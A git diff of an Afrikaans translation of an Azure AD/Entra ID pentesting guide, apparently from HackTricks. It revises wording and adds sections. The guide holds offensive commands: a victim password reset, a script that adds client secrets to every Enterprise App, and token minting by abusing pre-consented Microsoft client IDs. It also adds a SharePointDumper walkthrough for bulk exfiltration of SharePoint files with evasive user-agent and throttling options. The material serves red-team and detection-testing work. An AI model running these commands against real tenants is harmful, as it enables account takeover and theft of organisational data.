diff --git a/src/pentesting-cloud/azure-security/az-services/az-azuread.md b/src/pentesting-cloud/azure-security/az-services/az-azuread.md index c9e44ff05..e3ef23fdd 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-azuread.md +++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md @@ -4,11 +4,11 @@ ## Basiese Inligting -Azure Active Directory (Azure AD) dien as Microsoft se wolk-gebaseerde diens vir identiteit en toegang bestuur. Dit is noodsaaklik om werknemers in staat te stel om aan te meld en toegang tot hulpbronne te verkry, beide binne en buite die organisasie, insluitend Microsoft 365, die Azure-portaal, en 'n verskeidenheid ander SaaS-toepassings. Die ontwerp van Azure AD fokus op die lewering van noodsaaklike identiteitsdienste, wat prominent **autentisering, magtiging, en gebruikersbestuur** insluit. +Azure Active Directory (Azure AD) dien as Microsoft se wolkgebaseerde diens vir identiteit- en toegangsbestuur. Dit speel 'n sleutelrol om werknemers in staat te stel om aan te meld en toegang te kry tot hulpbronne, beide binne en buite die organisasie, insluitend Microsoft 365, die Azure portal, en 'n magdom ander SaaS-toepassings. Die ontwerp van Azure AD fokus op die verskaffing van noodsaaklike identiteitsdienste, veral **verifikasie, magtiging en gebruikersbestuur**. -Belangrike kenmerke van Azure AD sluit **multi-faktor autentisering** en **voorwaardelike toegang** in, tesame met naatlose integrasie met ander Microsoft-sekuriteitsdienste. Hierdie kenmerke verhoog die sekuriteit van gebruikersidentiteite aansienlik en bemagtig organisasies om hul toegangbeleide effektief te implementeer en af te dwing. As 'n fundamentele komponent van Microsoft se wolkdienste-ekosisteem, is Azure AD van kardinale belang vir die wolk-gebaseerde bestuur van gebruikersidentiteite. +Belangrike kenmerke van Azure AD sluit in **multi-faktor verifikasie** en **voorwaardelike toegang**, tesame met naatlose integrasie met ander Microsoft-sekuriteitsdienste. Hierdie funksies verhoog die veiligheid van gebruikersidentiteite aansienlik en stel organisasies in staat om hul toegangspolisies doeltreffend te implementeer en af te dwing. As 'n fundamentele komponent van Microsoft se wolkdienste-ekosisteem, is Azure AD van kritieke belang vir die wolkgebaseerde bestuur van gebruikersidentiteite. -## Enumerasie +## Enumeration ### **Verbinding** @@ -96,6 +96,7 @@ Connect-AzAccount -Credential $creds # Connect with access token Connect-AzAccount -AccountId test@corp.onmicrosoft.com [-AccessToken $ManagementToken] [-GraphAccessToken $AADGraphToken] [-MicrosoftGraphAccessToken $MicrosoftGraphToken] [-KeyVaultAccessToken $KeyVaultToken] +# If connecting with some metadata token, in "-AccountId" put the OID of the managed identity (get it from the JWT token) # Connect with Service principal/enterprise app secret $password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force @@ -184,11 +185,11 @@ Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token {{#endtab }} {{#endtabs }} -Wanneer jy **aanmeld** via **CLI** in Azure met enige program, gebruik jy 'n **Azure-toepassing** van 'n **tenant** wat aan **Microsoft** behoort. Hierdie Toepassings, soos die wat jy in jou rekening kan skep, **het 'n kliënt-id**. Jy **sal nie al hulle kan sien nie** in die **toegelate toepassingslys** wat jy in die konsole kan sien, **maar hulle is standaard toegelaat**. +Wanneer jy **login** via **CLI** in Azure met enige program, gebruik jy 'n **Azure Application** van 'n **tenant** wat aan **Microsoft** behoort. Hierdie Applications, soos diegene wat jy in jou rekening kan skep, **have a client id**. Jy **won't be able to see all of them** in die **allowed applications lists** wat jy in die console kan sien, **but they are allowed by default**. -Byvoorbeeld, 'n **powershell-skrip** wat **autentiseer** gebruik 'n app met kliënt-id **`1950a258-227b-4e31-a9cf-717495945fc2`**. Selfs al verskyn die app nie in die konsole nie, kan 'n stelselaanvoerder **daardie toepassing blokkeer** sodat gebruikers nie toegang kan verkry nie met gereedskap wat via daardie App verbind. +Byvoorbeeld, 'n **powershell script** wat **authenticates** gebruik 'n app met client id **`1950a258-227b-4e31-a9cf-717495945fc2`**. Selfs al verskyn die app nie in die console nie, kan 'n sysadmin daardie **block that application** toepas sodat gebruikers nie met tools wat via daardie App verbind toegang kan kry nie. -Daar is egter **ander kliënt-ids** van toepassings wat **jou sal toelaat om met Azure te verbind**: +Daar is egter **other client-ids** van applications wat **will allow you to connect to Azure**: ```bash # The important part is the ClientId, which identifies the application to login inside Azure @@ -226,7 +227,7 @@ az account tenant list ### Gebruikers -Vir meer inligting oor Entra ID gebruikers, kyk: +Vir meer inligting oor Entra ID-gebruikers, sien: {{#ref}} ../az-basic-information/ @@ -357,15 +358,15 @@ Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com {{#endtab }} {{#endtabs }} -#### Verander Gebruiker Wagwoord +#### Verander wagwoord van gebruiker ```bash $password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText –Force (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password –Verbose ``` -### MFA & Voorwaardelike Toegang Beleide +### MFA & Conditional Access Policies -Dit word sterk aanbeveel om MFA aan elke gebruiker toe te voeg, maar sommige maatskappye sal dit nie instel nie of mag dit instel met 'n Voorwaardelike Toegang: Die gebruiker sal **MFA vereis word as** dit vanaf 'n spesifieke ligging, blaaier of **sekere voorwaarde** aanmeld. Hierdie beleide, as dit nie korrek geconfigureer is nie, mag vatbaar wees vir **omseilings**. Kontroleer: +Dit word sterk aanbeveel om MFA by elke gebruiker te aktiveer; sommige maatskappye stel dit egter nie in nie, of stel dit as deel van 'n Conditional Access: Daar sal **vereis MFA as** die gebruiker vanaf 'n spesifieke ligging, blaaier of **'n bepaalde voorwaarde** aanmeld. Hierdie beleide, as dit nie korrek gekonfigureer is nie, kan vatbaar wees vir **bypasses**. Kyk: {{#ref}} ../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -373,7 +374,7 @@ Dit word sterk aanbeveel om MFA aan elke gebruiker toe te voeg, maar sommige maa ### Groepe -Vir meer inligting oor Entra ID groepe, kyk: +Vir meer inligting oor Entra ID-groepe, kyk: {{#ref}} ../az-basic-information/ @@ -482,21 +483,21 @@ Get-AzureADGroup -ObjectId | Get-AzureADGroupAppRoleAssignment | fl * #### Voeg gebruiker by groep -Eienaars van die groep kan nuwe gebruikers by die groep voeg +Eienaars van die groep kan nuwe gebruikers by die groep voeg. ```bash Add-AzureADGroupMember -ObjectId -RefObjectId -Verbose ``` > [!WARNING] -> Groepe kan dinamies wees, wat basies beteken dat **as 'n gebruiker aan sekere voorwaardes voldoen, sal hy aan 'n groep bygevoeg word**. Natuurlik, as die voorwaardes gebaseer is op **eienskappe** wat 'n **gebruiker** kan **beheer**, kan hy hierdie funksie misbruik om **in ander groepe te kom**.\ +> Groepe kan dinamies wees, wat basies beteken dat **as 'n gebruiker sekere voorwaardes vervul, hy by 'n groep gevoeg sal word**. Natuurlik, as die voorwaardes gebaseer is op **eienskappe** wat 'n **gebruiker** kan **beïnvloed**, kan hy hierdie funksie misbruik om **in ander groepe te kom**.\ > Kyk hoe om dinamiese groepe te misbruik op die volgende bladsy: {{#ref}} ../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md {{#endref}} -### Diens Principals +### Service Principals -Vir meer inligting oor Entra ID diens principals, kyk: +Vir meer inligting oor Entra ID service principals sien: {{#ref}} ../az-basic-information/ @@ -597,11 +598,11 @@ Get-AzureADServicePrincipal -ObjectId | Get-AzureADServicePrincipalMembersh {{#endtabs }} > [!WARNING] -> Die Eienaar van 'n Diens Prinsipaal kan sy wagwoord verander. +> Die Owner van 'n Service Principal kan sy wagwoord verander.
-Lyste en probeer om 'n kliënt geheim by elke Enterprise App te voeg +Lys en probeer om 'n client secret by elke Enterprise App te voeg ```bash # Just call Add-AzADAppSecret Function Add-AzADAppSecret @@ -706,18 +707,18 @@ Write-Output "Failed to Enumerate the Applications." ```
-### Toepassings +### Aansoeke -Vir meer inligting oor Toepassings, kyk: +Vir meer inligting oor Aansoeke, sien: {{#ref}} ../az-basic-information/ {{#endref}} -Wanneer 'n App gegenereer word, word 2 tipes toestemmings gegee: +Wanneer 'n App gegenereer word, word 2 tipes permissies gegee: -- **Toestemmings** gegee aan die **Diens Prinsipaal** -- **Toestemmings** wat die **app** kan hê en gebruik op **naam van die gebruiker**. +- **Permissies** wat aan die **Service Principal** gegee word +- **Permissies** wat die **app** kan hê en **namens die gebruiker** kan gebruik. {{#tabs }} {{#tab name="az cli" }} @@ -742,6 +743,33 @@ az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92 # Get Cloud Applications Administrators (full access over apps) az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members" +# Get "API Permissions" of an App +## Get the ResourceAppId +az ad app show --id "" --query "requiredResourceAccess" --output json +## e.g. +[ +{ +"resourceAccess": [ +{ +"id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d", +"type": "Scope" +}, +{ +"id": "d07a8cc0-3d51-4b77-b3b0-32704d1f69fa", +"type": "Role" +} +], +"resourceAppId": "00000003-0000-0000-c000-000000000000" +} +] + +## For the perms of type "Scope" +az ad sp show --id --query "oauth2PermissionScopes[?id==''].value" -o tsv +az ad sp show --id "00000003-0000-0000-c000-000000000000" --query "oauth2PermissionScopes[?id=='e1fe6dd8-ba31-4d61-89e7-88639da4683d'].value" -o tsv + +## For the perms of type "Role" +az ad sp show --id --query "appRoles[?id==''].value" -o tsv +az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv ``` {{#endtab }} @@ -792,21 +820,21 @@ Get-AzureADApplication -ObjectId | Get-AzureADApplicationOwner |fl * {{#endtabs }} > [!WARNING] -> 'n Toepassing met die toestemming **`AppRoleAssignment.ReadWrite`** kan **opgradeer na Global Admin** deur vir homself die rol toe te ken.\ -> Vir meer inligting [**kyk hier**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48). +> 'n app met die toestemming **`AppRoleAssignment.ReadWrite`** kan homself tot Global Admin eskaleer deur homself die rol te gee.\ +> Vir meer inligting [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48). > [!NOTE] -> 'n Geheime string wat die toepassing gebruik om sy identiteit te bewys wanneer dit 'n token aan vra, is die toepassingswagwoord.\ -> So, as jy hierdie **wagwoord** vind, kan jy toegang verkry as die **service principal** **binne** die **tenant**.\ -> Let daarop dat hierdie wagwoord slegs sigbaar is wanneer dit gegenereer word (jy kan dit verander, maar jy kan dit nie weer kry nie).\ -> Die **eienaar** van die **toepassing** kan 'n **wagwoord** daaraan **byvoeg** (sodat hy dit kan naboots).\ -> Aanmeldings as hierdie service principals is **nie as riskant gemerk nie** en hulle **sal nie MFA hê nie.** +> 'n Geheime string wat die application gebruik om sy identiteit te bewys wanneer dit 'n token versoek, is die application **password**.\ +> Dus, as jy hierdie **password** vind kan jy toegang kry as die **service principal** binne die **tenant**.\ +> Let wel dat hierdie **password** slegs sigbaar is wanneer dit gegenereer word (jy kan dit verander maar jy kan dit nie weer kry nie).\ +> Die **owner** van die **application** kan **add a password** daaraan voeg (sodat hy dit kan impersonate).\ +> Aanmeldings as hierdie service principals word **nie as riskant gemerk nie** en hulle **sal nie MFA hê nie.** -Dit is moontlik om 'n lys van algemeen gebruikte App ID's wat aan Microsoft behoort te vind in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) +Dit is moontlik om 'n lys van algemeen gebruikte App IDs wat aan Microsoft behoort te vind in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) -### Gemanagte Identiteite +### Managed Identities -Vir meer inligting oor Gemanagte Identiteite kyk: +Vir meer inligting oor Managed Identities, kyk: {{#ref}} ../az-basic-information/ @@ -824,7 +852,7 @@ az identity list --output table ### Azure Rolle -Vir meer inligting oor Azure rolle, kyk: +Vir meer inligting oor Azure-rolle, sien: {{#ref}} ../az-basic-information/ @@ -909,9 +937,9 @@ Headers = @{ {{#endtab }} {{#endtabs }} -### Entra ID Rolle +### Entra ID-rolle -Vir meer inligting oor Azure rolle, kyk: +Vir meer inligting oor Azure-rolle, kyk: {{#ref}} ../az-basic-information/ @@ -1032,12 +1060,12 @@ Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember {{#endtabs }} > [!WARNING] -> As 'n toestel (VM) **AzureAD aangesluit** is, gaan gebruikers van AzureAD **in staat wees om aan te meld**.\ -> Boonop, as die aangemelde gebruiker die **Eienaar** van die toestel is, gaan hy **lokale admin** wees. +> As 'n toestel (VM) **AzureAD joined** is, sal gebruikers van AzureAD **in staat wees om aan te meld**.\ +> Boonop, as die aangemelde gebruiker **Owner** van die toestel is, sal hy **local admin** wees. ### Administratiewe Eenhede -Vir meer inligting oor administratiewe eenhede, kyk: +Vir meer inligting oor administratiewe eenhede, sien: {{#ref}} ../az-basic-information/ @@ -1072,6 +1100,53 @@ Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members {{#endtab }} {{#endtabs }} +## Microsoft Graph gedelegeerde SharePoint data-exfiltrasie (SharePointDumper) + +Aanvallers met 'n **gedelegeerde Microsoft Graph token** wat **`Sites.Read.All`** of **`Sites.ReadWrite.All`** insluit, kan **sites/drives/items** oor Graph opnoem en dan **lêerinhoud haal** via **SharePoint pre-authentication download URLs** (tydbeperkte URL's met 'n ingebedde toegangstoken). Die [SharePointDumper](https://github.com/zh54321/SharePointDumper) script outomatiseer die volledige vloei (enumeration → pre-auth downloads) en lewer per-versoek telemetrie vir deteksietoetsing. + +### Verkryging van bruikbare gedelegeerde tokens + +- SharePointDumper self **authentikeer nie**; verskaf 'n access token (opsioneel 'n refresh token). +- Pre-consented **first-party clients** kan misbruik word om 'n Graph token te mint sonder om 'n app te registreer. Voorbeeld `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) aanroepe: +```powershell +# CAE requested by default; yields long-lived (~24h) access token +Import-Module ./EntraTokenAid/EntraTokenAid.psm1 +$tokens = Invoke-Auth -ClientID 'b26aadf8-566f-4478-926f-589f601d9c74' -RedirectUrl 'urn:ietf:wg:oauth:2.0:oob' # OneDrive (FOCI TRUE) + +# Other pre-consented clients +Invoke-Auth -ClientID '1fec8e78-bce4-4aaf-ab1b-5451cc387264' -RedirectUrl 'https://login.microsoftonline.com/common/oauth2/nativeclient' # Teams (FOCI TRUE) +Invoke-Auth -ClientID 'd326c1ce-6cc6-4de2-bebc-4591e5e13ef0' -RedirectUrl 'msauth://code/ms-sharepoint-auth%3A%2F%2Fcom.microsoft.sharepoint' # SharePoint (FOCI TRUE) +Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https://scuprodprv.www.microsoft365.com/spalanding' -Origin 'https://doesnotmatter' # OfficeHome (FOCI FALSE) +Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' -Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE) +``` +> [!NOTE] +> FOCI TRUE kliënte ondersteun refresh oor toestelle; FOCI FALSE kliënte vereis dikwels `-Origin` om reply URL origin validation te bevredig. + +### Uitvoering van SharePointDumper vir enumeration + exfiltration + +- Basiese dump met aangepaste UA / proxy / throttling: +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080' +``` +- Omvangbeheer: insluit/uitsluit webwerwe of uitbreidings en globale limiete: +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100 +``` +- **Resume** onderbroke runs (re-enumerates, maar slaan afgelaaide items oor): +```powershell +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant +``` +- **Outomatiese token-hernuwing by HTTP 401** (vereis EntraTokenAid gelaai): +```powershell +Import-Module ./EntraTokenAid/EntraTokenAid.psm1 +.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74' +``` +Operasionele notas: + +- Voorkeur vir **CAE-enabled** tokens om mid-run verval te voorkom; herlaaipogings word **nie** in die hulpmiddel se API-log aangeteken nie. +- Genereer **CSV/JSON request logs** vir **Graph + SharePoint** en maskeer ingebedde SharePoint download tokens standaard (skakelbaar). +- Ondersteun **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, en **Ctrl+C-safe shutdown** vir verkeersvorming tydens detectie/IR-toetse. + ## Entra ID Privilege Escalation {{#ref}} @@ -1088,58 +1163,58 @@ Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members ### Privileged Identity Management (PIM) -Privileged Identity Management (PIM) in Azure help om **oormatige voorregte** te voorkom wat onnodig aan gebruikers toegeken word. +Privileged Identity Management (PIM) in Azure help om te voorkom dat gebruikers onnodig buitensporige voorregte toegeken word. -Een van die hoofkenmerke wat deur PIM verskaf word, is dat dit toelaat om nie rolle aan principals toe te ken wat konstant aktief is nie, maar om hulle **verkieslik te maak vir 'n tydperk (bv. 6 maande)**. Dan, wanneer die gebruiker daardie rol wil aktiveer, moet hy daarvoor vra en die tyd aan dui wat hy die voorreg nodig het (bv. 3 uur). Dan moet 'n **admin die versoek goedkeur**.\ -Let daarop dat die gebruiker ook kan vra om die tyd te **verleng**. +Een van die hoofkenmerke van PIM is dat dit toelaat om rolle nie aan principals wat konstant aktief is toe te ken nie, maar om hulle vir 'n bepaalde tydperk kwalifiseerbaar te maak (bv. 6 maande). Wanneer die gebruiker die rol wil aktiveer, moet hy daarvoor vra en die tyd aandui wat hy die voorreg benodig (bv. 3 uur). Dan moet 'n admin die versoek goedkeur. Let wel: die gebruiker kan ook vra om die tyd te verleng. -Boonop, **PIM stuur e-posse** wanneer 'n voorregte rol aan iemand toegeken word. +Verder stuur PIM e-posse wanneer 'n privileged role aan iemand toegeken word.
-Wanneer PIM geaktiveer is, is dit moontlik om elke rol met sekere vereistes te konfigureer soos: +Wanneer PIM aangeskakel is, is dit moontlik om elke rol met sekere vereistes te konfigureer, soos: - Maksimum duur (ure) van aktivering -- Vereis MFA op aktivering -- Vereis voorwaardelike toegang autentikasie konteks -- Vereis regverdigings op aktivering -- Vereis kaartjie-inligting op aktivering +- Vereis MFA by aktivering +- Vereis Conditional Access authentication context +- Vereis regverdiging by aktivering +- Vereis ticket-inligting by aktivering - Vereis goedkeuring om te aktiveer -- Maks tyd om die verkieslike toekennings te laat verval -- Nog baie meer konfigurasie oor wanneer en aan wie om kennisgewings te stuur wanneer sekere aksies met daardie rol gebeur +- Maksimum tyd waarna die kwalifiserende toewysings verval +- Baie meer konfigurasie oor wanneer en aan wie kennisgewings gestuur moet word wanneer sekere aksies met daardie rol gebeur -### Voorwaardelike Toegang Beleide +### Conditional Access Policies -Kontroleer: +Sien: {{#ref}} ../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md {{#endref}} -### Entra Identiteitsbeskerming +### Entra Identity Protection -Entra Identiteitsbeskerming is 'n sekuriteitsdiens wat toelaat om te **ontdek wanneer 'n gebruiker of 'n aanmelding te riskant is** om aanvaar te word, wat toelaat om die gebruiker of die aanmeldpoging te **blokkeer**. +Entra Identity Protection is 'n sekuriteitsdiens wat toelaat om te detect wanneer 'n gebruiker of 'n sign-in te riskant is om te aanvaar, en om die gebruiker of die sign-in poging te block. -Dit laat die admin toe om dit te konfigureer om **pogings te blokkeer** wanneer die risiko "Laag en bo", "Medium en bo" of "Hoog" is. Alhoewel, standaard is dit heeltemal **deaktiveer**: +Dit stel die admin in staat om dit te konfigureer om pogings te blokkeer wanneer die risiko "Low and above", "Medium and above" of "High" is. Alhoewel, standaard is dit heeltemal "disabled":
> [!TIP] -> Vandag word dit aanbeveel om hierdie beperkings via Voorwaardelike Toegang beleide toe te voeg waar dit moontlik is om dieselfde opsies te konfigureer. +> Tans word dit aanbeveel om hierdie beperkings via Conditional Access-beleide by te voeg waar dieselfde opsies gekonfigureer kan word. -### Entra Wagwoordbeskerming +### Entra Password Protection -Entra Wagwoordbeskerming ([https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is 'n sekuriteitskenmerk wat **help om die misbruik van swak wagwoorde te voorkom deur rekeninge te sluit wanneer verskeie onsuksesvolle aanmeldpogings plaasvind**.\ -Dit laat ook toe om 'n **aangepaste wagwoordlys te verbied** wat jy moet verskaf. +Entra Password Protection ([https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is 'n sekuriteitsfunksie wat help om die misbruik van swak wagwoorde te voorkom deur rekeninge te sluit wanneer verskeie onsuksesvolle aanmeldpogings plaasvind. Dit laat ook toe om 'n pasgemaakte wagwoordlys te verbied wat jy moet voorsien. -Dit kan **op beide** die wolkvlak en op-premises Aktiewe Directory toegepas word. +Dit kan toegepas word beide op die cloudvlak en op on-premises Active Directory. -Die standaardmodus is **Oudit**: +Die standaardmodus is **Audit**:
-## Verwysings +## References - [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units) +- [SharePointDumper](https://github.com/zh54321/SharePointDumper) +- [EntraTokenAid](https://github.com/zh54321/EntraTokenAid) {{#include ../../../banners/hacktricks-training.md}}